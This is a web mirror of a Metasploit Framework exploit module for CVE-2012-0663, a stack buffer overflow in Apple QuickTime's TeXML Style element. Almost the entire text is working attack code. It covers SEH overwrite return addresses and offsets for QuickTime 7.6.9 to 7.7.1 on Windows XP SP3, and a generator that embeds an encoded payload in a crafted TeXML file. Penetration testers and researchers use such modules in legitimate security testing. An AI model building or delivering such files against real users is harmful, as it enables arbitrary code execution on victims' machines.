Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/apple_quicktime_texml.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Apple QuickTime TeXML Style Element Stack Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a vulnerability found in Apple QuickTime. When handling

19
          a TeXML file, it is possible to trigger a stack-based buffer overflow, and then

20
          gain arbitrary code execution under the context of the user.  This is due to the

21
          QuickTime3GPP.gtx component not handling certain Style subfields properly, storing

22
          user-supplied data on the stack, which results the overflow.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'Alexander Gavrun', # Vulnerability Discovery

27
          'sinn3r',            # Metasploit Module

28
          'juan vazquez'       # Metasploit Module

29
        ],

30
        'References' => [

31
          [ 'OSVDB', '81934' ],

32
          [ 'CVE', '2012-0663' ],

33
          [ 'BID', '53571' ],

34
          [ 'ZDI', '12-107' ],

35
          [ 'URL', 'http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html' ],

36
          [ 'URL', 'http://support.apple.com/kb/HT1222' ]

37
        ],

38
        'Payload' => {

39
          'DisableNops' => true,

40
          'BadChars' => "\x00\x23\x25\x3c\x3e\x7d"

41
        },

42
        'Platform' => 'win',

43
        'Targets' => [

44
          [

45
            'QuickTime 7.7.1 on Windows XP SP3',

46
            {

47
              'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42)

48
              'Offset' => 643,

49
              'Max' => 13508

50
            }

51
          ],

52
          [

53
            'QuickTime 7.7.0 on Windows XP SP3',

54
            {

55
              'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34)

56
              'Offset' => 643,

57
              'Max' => 13508

58
            }

59
          ],

60
          [

61
            'QuickTime 7.6.9 on Windows XP SP3',

62
            {

63
              'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9)

64
              'Offset' => 643,

65
              'Max' => 13508

66
            }

67
          ],

68
        ],

69
        'Privileged' => false,

70
        'DisclosureDate' => '2012-05-15',

71
        'Notes' => {

72
          'Reliability' => UNKNOWN_RELIABILITY,

73
          'Stability' => UNKNOWN_STABILITY,

74
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

75
        }

76
      )

77
    )

78


79
    register_options(

80
      [

81
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']),

82
      ]

83
    )

84
  end

85


86
  def exploit

87
    my_payload = rand_text(target['Offset'])

88
    my_payload << generate_seh_record(target.ret)

89
    my_payload << payload.encoded

90
    my_payload << rand_text(target['Max'] - my_payload.length)

91


92
    texml = <<-eos

93
    <?xml version="1.0"?>

94
    <?quicktime type="application/x-quicktime-texml"?>

95


96
    <text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"

97
      language="eng" timeScale="600"

98
      transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">

99
      <sample duration="2400" keyframe="true">

100


101
        <description format="tx3g" displayFlags="ScrollIn"

102
          horizontalJustification="Left"

103
          verticalJustification="Top"

104
          backgroundColor="0%, 0%, 0%, 100%">

105


106
          <defaultTextBox x="0" y="0" width="176"  height="60"/>

107
          <fontTable>

108
            <font id="1" name="Times"/>

109
          </fontTable>

110


111
          <sharedStyles>

112
          <style id="1">

113
            {font-table: 1} {font-size:  10}

114
            {font-style:normal}

115
            {font-weight: normal}

116
            {color: #{my_payload}%, 100%, 100%, 100%}

117
          </style>

118
          </sharedStyles>

119
        </description>

120


121
        <sampleData scrollDelay="200"

122
          highlightColor="25%, 45%, 65%, 100%"

123
          targetEncoding="utf8">

124


125
          <textBox x="10" y="10" width="156"  height="40"/>

126
            <text styleID="1">What you need... Metasploit!</text>

127
            <highlight startMarker="1" endMarker="2"/>

128
            <blink startMarker="3" endMarker="4"/>

129
        </sampleData>

130
      </sample>

131
    </text3GTrack>

132
    eos

133


134
    texml = texml.gsub(/^ {4}/, '')

135


136
    print_status("Creating '#{datastore['FILENAME']}'.")

137
    file_create(texml)

138
  end

139
end

140


141